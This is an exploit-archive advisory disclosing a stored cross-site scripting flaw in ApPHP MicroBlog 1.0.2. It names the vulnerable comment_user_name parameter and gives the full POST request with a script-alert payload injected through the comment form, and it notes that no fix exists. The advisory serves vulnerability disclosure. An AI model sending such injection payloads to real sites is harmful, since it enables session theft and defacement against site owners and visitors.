ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting

2016-10-11 04:05:04

# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross
Site Scripting
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162

Description :

Vulnerable link : http://site_name/path/index.php?page=posts&post_id=

Stored XSS Payload ( Comments ): *

# Vulnerable URL :
http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name

############ POST DATA ############

task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&[email protected]&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
your comment

############ ######################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.